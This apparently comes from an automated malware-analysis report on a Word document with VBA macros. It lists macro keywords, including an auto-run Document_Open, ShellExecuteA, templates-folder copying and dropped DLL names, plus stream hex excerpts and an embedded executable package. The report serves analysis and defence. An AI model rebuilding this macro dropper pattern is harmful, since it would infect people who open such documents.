                                        Keyword
                                        Attribute
                                        VB_Name
                                        VBA Code
                                        VBA File Name: Module3.bas, Stream Size: 1994
                                        General
                                        Stream Path:Macros/VBA/Module3
                                        VBA File Name:Module3.bas
                                        Stream Size:1994
                                        Data ASCII:. . . . . . . . . : . . . . . . . . . . . . . . . A . . . M . . . . . . . . . . . i . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                        Data Raw:01 16 03 00 01 f0 00 00 00 3a 03 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 41 03 00 00 4d 06 00 00 00 00 00 00 01 00 00 00 69 e8 20 d4 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                        VBA Code Keywords

                                        Keyword
                                        bvxfcsd()
                                        ewrwsdf
                                        Dir(Left(Options.DefaultFilePath(wdUserTemplatesPath),
                                        VB_Name
                                        vbDirectory)
                                        dfbvc
                                        ewrwsdf,
                                        String
                                        ThisDocument.hdhdd(Left(Options.DefaultFilePath(wdUserTemplatesPath),
                                        ntgs)
                                        "\Te"
                                        While
                                        asda()
                                        ewrwsdf)
                                        Attribute
                                        VBA Code
                                        VBA File Name: ThisDocument.cls, Stream Size: 5473
                                        General
                                        Stream Path:Macros/VBA/ThisDocument
                                        VBA File Name:ThisDocument.cls
                                        Stream Size:5473
                                        Data ASCII:. . . . . 0 . . . d . . . . . . . . . . . 1 . . . ? . . . . . . . . . . . . . . . i . F . . . . . . . . . . . . . . . . . . . 0 . . . . . : . . . . . . 9 . . . . . . . . . . . . . . . . . . . . . S h e l l E x e c u t e A . . . . . . . . . . . . . . . . . . . < y . . . . ' D . . . . . # . . . . * [ . . o M . + a . . ( . . . . . . . . . . . . . . . . . . . . . . u . . . > . . E . 9 5 . . . o F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . u . . . > . . E . 9 5 . . . o F < y
                                        Data Raw:01 16 03 00 06 30 01 00 00 64 0a 00 00 14 01 00 00 9a 02 00 00 31 0b 00 00 3f 0b 00 00 87 11 00 00 02 00 00 00 01 00 00 00 69 e8 46 81 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 30 00 00 00 00 00 3a 02 20 00 00 00 ff ff 39 d2 1e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 53 68 65 6c 6c 45 78 65 63 75 74 65 41 00 00 00 ff ff ff ff 01 00 00 00 ff ff 80 00 ff

                                        VBA Code Keywords

                                        Keyword
                                        vbNullString,
                                        Unit:=wdCharacter,
                                        Long)
                                        Long,
                                        cvzz,
                                        Explicit
                                        Document_Open()
                                        PtrSafe
                                        Declare
                                        nam(hdv)
                                        False
                                        lpFile
                                        Selection.MoveDown
                                        Scripting.FileSystemObject
                                        MySubFolder
                                        lpOperation
                                        String,
                                        Dir(vcbc
                                        DestinationFolder
                                        nShowCmd
                                        String
                                        Unit:=wdLine,
                                        "\niberius.dll")
                                        MyFolder
                                        wdUserTemplatesPath
                                        MyFSO
                                        lpParameters
                                        Options.DefaultFilePath(cx)
                                        VB_Base
                                        "ll,ONOQWPYIEIR",
                                        ByVal
                                        bvxfcsd
                                        VB_Creatable
                                        VB_Exposed
                                        (ByVal
                                        String)
                                        MyFile
                                        "\niberius.d"
                                        "ThisDocument"
                                        FileSystemObject
                                        Selection.Copy
                                        Search(MyFSO.GetFolder(asda),
                                        Compare
                                        Attribute
                                        VB_PredeclaredId
                                        VB_GlobalNameSpace
                                        VB_Name
                                        Folder
                                        "ShellExecuteA"
                                        Function
                                        yyy()
                                        Len(hdv)
                                        VB_Customizable
                                        Alias
                                        lpDirectory
                                        hdhdd(asda
                                        VB_TemplateDerived
                                        Selection.MoveRight
                                        Option
                                        Selection.TypeBackspace
                                        SourceFolder
                                        Private
                                        VBA Code

                                        Streams

                                        Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                                        General
                                        Stream Path:\x1CompObj
                                        File Type:data
                                        Stream Size:114
                                        Entropy:4.2359563651
                                        Base64 Encoded:True
                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q . . . . . . . . . . . .
                                        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                        Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 280
                                        General
                                        Stream Path:\x5DocumentSummaryInformation
                                        File Type:data
                                        Stream Size:280
                                        Entropy:2.37656366396
                                        Base64 Encoded:False
                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                        Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
                                        Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 424
                                        General
                                        Stream Path:\x5SummaryInformation
                                        File Type:data
                                        Stream Size:424
                                        Entropy:3.23689176367
                                        Base64 Encoded:False
                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4 . . . . . . . @ . . . . . . . L . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M r . A d m i n i s t r a t o r . . . . . . . .
                                        Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 78 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 cc 00 00 00 06 00 00 00 d8 00 00 00 07 00 00 00 e4 00 00 00 08 00 00 00 f8 00 00 00 09 00 00 00 08 01 00 00
                                        Stream Path: 1Table, File Type: ARC archive data, crunched, Stream Size: 8450
                                        General
                                        Stream Path:1Table
                                        File Type:ARC archive data, crunched
                                        Stream Size:8450
                                        Entropy:5.94622189046
                                        Base64 Encoded:True
                                        Data ASCII:. . . . . . . . w . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
                                        Data Raw:1a 06 0f 00 12 00 01 00 77 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                                        Stream Path: Data, File Type: data, Stream Size: 566599
                                        General
                                        Stream Path:Data
                                        File Type:data
                                        Stream Size:566599
                                        Entropy:7.97264179911
                                        Base64 Encoded:True
                                        Data ASCII:. . . . D . d . . . . . . . . . . . . . . . . . . . . . . J . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . . V . . . . . . . . . f . t . d . . . P . i . c . t . u . r . e . . 6 . 5 . 7 . . . C . : . \\ . U . s . e . r . s . \\ . M . y . P . c . \\ . D . e . s . k . t . o . p . \\ . B . u . i . l . d . e . r . _ . v . 6 . 6 . 7 . \\ .
                                        Data Raw:1a 9e 08 00 44 00 64 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 fe 4a df 2e e7 01 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 de 00 00 00 b2 04 0a f0 08 00 00 00 92 06 00 00 00 0a 00 00 93 00 0b f0 ac 00 00 00 7f 00 80 00 f9 01 04 41 02 00 00 00 05 c1 08 00 00 00 3f 01 00 00 06 00 bf 01 00 00
                                        Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 515
                                        General
                                        Stream Path:Macros/PROJECT
                                        File Type:ASCII text, with CRLF line terminators
                                        Stream Size:515
                                        Entropy:5.33328702424
                                        Base64 Encoded:True
                                        Data ASCII:I D = " { D 5 C 3 3 6 9 A - A E 0 8 - 4 3 7 1 - 8 9 E B - F 7 6 A 1 8 A 1 9 3 E 0 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 1 . . M o d u l e = M o d u l e 2 . . M o d u l e = M o d u l e 3 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 5 1 5 3 B 2 3 2 B 6 3 2 B 6 3 2 B 6 3 2 B 6 " . . D P B = " 0 4 0 6 E 7 5 A 2 9 0 C 2 A 0 C 2 A 0 C " . . G C =
                                        Data Raw:49 44 3d 22 7b 44 35 43 33 33 36 39 41 2d 41 45 30 38 2d 34 33 37 31 2d 38 39 45 42 2d 46 37 36 41 31 38 41 31 39 33 45 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 31 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 32 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 33 0d 0a 4e
                                        Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 113
                                        General
                                        Stream Path:Macros/PROJECTwm
                                        File Type:data
                                        Stream Size:113
                                        Entropy:3.24854178505
                                        Base64 Encoded:False
                                        Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . M o d u l e 2 . M . o . d . u . l . e . 2 . . . M o d u l e 3 . M . o . d . u . l . e . 3 . . . . .
                                        Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 4d 6f 64 75 6c 65 32 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 32 00 00 00 4d 6f 64 75 6c 65 33 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 33 00 00 00 00 00
                                        Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 3880
                                        General
                                        Stream Path:Macros/VBA/_VBA_PROJECT
                                        File Type:data
                                        Stream Size:3880
                                        Entropy:4.72165782537
                                        Base64 Encoded:True
                                        Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
                                        Data Raw:cc 61 b2 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 06 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                        Stream Path: Macros/VBA/__SRP_0, File Type: data, Stream Size: 3020
                                        General
                                        Stream Path:Macros/VBA/__SRP_0
                                        File Type:data
                                        Stream Size:3020
                                        Entropy:3.38046138898
                                        Base64 Encoded:False
                                        Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * \\ C N o r m a l r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ < . . . . . . . . . . . . . . . " . . . . . . . . . . . . . .
                                        Data Raw:93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 00 00 01 00 00 00 00 00 01 00 02 00 01 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 01 00 09 00 00 00 2a 5c 43 4e 6f 72 6d 61 6c 72 55 80 01 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00
                                        Stream Path: Macros/VBA/__SRP_1, File Type: data, Stream Size: 429
                                        General
                                        Stream Path:Macros/VBA/__SRP_1
                                        File Type:data
                                        Stream Size:429
                                        Entropy:2.68194423382
                                        Base64 Encoded:False
                                        Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . h w n d . . . . . . . . . . . . . . . . l p O p e r a t i o n . . . . . . . . . . . . . . . . l p F i l e .
                                        Data Raw:72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 7a 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 11 00 00 00 00 00 00 00 00 00 05 00 ff ff
                                        Stream Path: Macros/VBA/__SRP_2, File Type: data, Stream Size: 1887
                                        General
                                        Stream Path:Macros/VBA/__SRP_2
                                        File Type:data
                                        Stream Size:1887
                                        Entropy:3.0552390637
                                        Base64 Encoded:False
                                        Data ASCII:r U . . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . . . . . . . . . . . . . . . . . . . . . . 1 . . . . .
                                        Data Raw:72 55 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 05 00 04 00 12 00 00 00 11 10 00 00 00 00 00 00 00 00 00 00 81 11 00 00 00 00 00 00 00 00 00 00 e1 0a 00 00 00 00 00 00 00 00
                                        Stream Path: Macros/VBA/__SRP_3, File Type: data, Stream Size: 458
                                        General
                                        Stream Path:Macros/VBA/__SRP_3
                                        File Type:data
                                        Stream Size:458
                                        Entropy:2.2800173039
                                        Base64 Encoded:False
                                        Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . a . . . . . . . . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . 8 . . . . . . . . . . . . . . .
                                        Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 88 00 00 00 08 00 78 00 61 0a 00 00 00 00 00 00 00 00 00 00 00 00 04 70 18 00 fe ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
                                        Stream Path: Macros/VBA/__SRP_4, File Type: data, Stream Size: 630
                                        General
                                        Stream Path:Macros/VBA/__SRP_4
                                        File Type:data
                                        Stream Size:630
                                        Entropy:1.39930012136
                                        Base64 Encoded:False
                                        Data ASCII:r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . H . . . . . . . . . . . . . . . i . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . H . . . . . . . . . . . . . . . i . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                        Data Raw:72 55 80 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 05 00 10 00 00 00 00 00 00 00 00 00 04 00 04 00 04 00 00 00 00 00 48 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 69 02
                                        Stream Path: Macros/VBA/__SRP_5, File Type: data, Stream Size: 364
                                        General
                                        Stream Path:Macros/VBA/__SRP_5
                                        File Type:data
                                        Stream Size:364
                                        Entropy:2.01734586074
                                        Base64 Encoded:False
                                        Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . a . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . @ . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . . .
                                        Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 04 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 38 00 f1 00 00 00 00 00 00 00 00 00 04 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
                                        Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 729
                                        General
                                        Stream Path:Macros/VBA/dir
                                        File Type:data
                                        Stream Size:729
                                        Entropy:6.4341113282
                                        Base64 Encoded:True
                                        Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . . y . b . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * , \\ C . . . . q . m . .
                                        Data Raw:01 d5 b2 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 9e 79 db 62 09 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30
                                        Stream Path: ObjectPool/_1687137834/\x1CompObj, File Type: data, Stream Size: 76
                                        General
                                        Stream Path:ObjectPool/_1687137834/\x1CompObj
                                        File Type:data
                                        Stream Size:76
                                        Entropy:3.09344952647
                                        Base64 Encoded:False
                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . O L E P a c k a g e . . . . . . . . . P a c k a g e . . 9 . q . . . . . . . . . . . .
                                        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 0c 00 03 00 00 00 00 00 c0 00 00 00 00 00 00 46 0c 00 00 00 4f 4c 45 20 50 61 63 6b 61 67 65 00 00 00 00 00 08 00 00 00 50 61 63 6b 61 67 65 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                        Stream Path: ObjectPool/_1687137834/\x1Ole10Native, File Type: data, Stream Size: 274741
                                        General
                                        Stream Path:ObjectPool/_1687137834/\x1Ole10Native
                                        File Type:data
                                        Stream Size:274741
                                        Entropy:6.4905824149
                                        Base64 Encoded:True
                                        Data ASCII:1 1 . . . . n i m b . d l l . C : \\ U s e r s \\ M y P c \\ D e s k t o p \\ B u i l d e r _ v 6 6 7 \\ n i m b . d l l . . . . . * . . . C : \\ U s e r s \\ M y P c \\ A p p D a t a \\ L o c a l \\ T e m p \\ n i m b . d l l . . 0 . . M Z . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . L . ! T h i s p r o g r a m c a n n o t b e r u n i n D O S m o d e . . . . $ . . . . . . . o . . . + . . . + . . . + . .
                                        Data Raw:31 31 04 00 02 00 6e 69 6d 62 2e 64 6c 6c 00 43 3a 5c 55 73 65 72 73 5c 4d 79 50 63 5c 44 65 73 6b 74 6f 70 5c 42 75 69 6c 64 65 72 5f 76 36 36 37 5c 6e 69 6d 62 2e 64 6c 6c 00 00 00 03 00 2a 00 00 00 43 3a 5c 55 73 65 72 73 5c 4d 79 50 63 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 54 65 6d 70 5c 6e 69 6d 62 2e 64 6c 6c 00 00 30 04 00 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00
                                        Stream Path: ObjectPool/_1687137834/\x3EPRINT, File Type: Windows Enhanced Metafile (EMF) image data version 0x10000, Stream Size: 4980
                                        General
                                        Stream Path:ObjectPool/_1687137834/\x3EPRINT
                                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                        Stream Size:4980
                                        Entropy:3.85346385078
                                        Base64 Encoded:False
                                        Data ASCII:. . . . l . . . . . . . . . . . 1 . . . / . . . . . . . . . . . . . . . . . . . E M F . . . . t . . . . . . . . . . . . . . . . . . . . . . . V . . . . . . . i . . . . . . . . . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . . . . . . . . . . . . . . 7 . . . 5 . . . R . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S . e . g . o . e . . U . I . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . . . . . . .
                                        Data Raw:01 00 00 00 6c 00 00 00 06 00 00 00 00 00 00 00 31 00 00 00 2f 00 00 00 00 00 00 00 00 00 00 00 c8 05 00 00 91 05 00 00 20 45 4d 46 00 00 01 00 74 13 00 00 0d 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 56 05 00 00 97 02 00 00 69 01 00 00 af 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 cc 83 05 00 3a ad 02 00 0a 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 09 00 00 00
                                        Stream Path: ObjectPool/_1687137834/\x3ObjInfo, File Type: data, Stream Size: 6
                                        General
                                        Stream Path:ObjectPool/_1687137834/\x3ObjInfo
                                        File Type:data
                                        Stream Size:6
                                        Entropy:1.25162916739
                                        Base64 Encoded:False
                                        Data ASCII:. . . . . .
                                        Data Raw:00 00 03 00 0d 00
                                        Stream Path: WordDocument, File Type: data, Stream Size: 4096
                                        General
                                        Stream Path:WordDocument
                                        File Type:data
                                        Stream Size:4096
                                        Entropy:1.37552863686
                                        Base64 Encoded:False
                                        Data ASCII:. . . . Y . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b j b j 8 . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . Z p . e Z p . e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . B . . . . . . . B . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                        Data Raw:ec a5 c1 00 59 00 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 18 08 00 00 0e 00 62 6a 62 6a 38 1a 38 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e 0e 00 00 5a 70 d2 65 5a 70 d2 65 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

                                        Network Behavior

                                        Snort IDS Alerts

                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
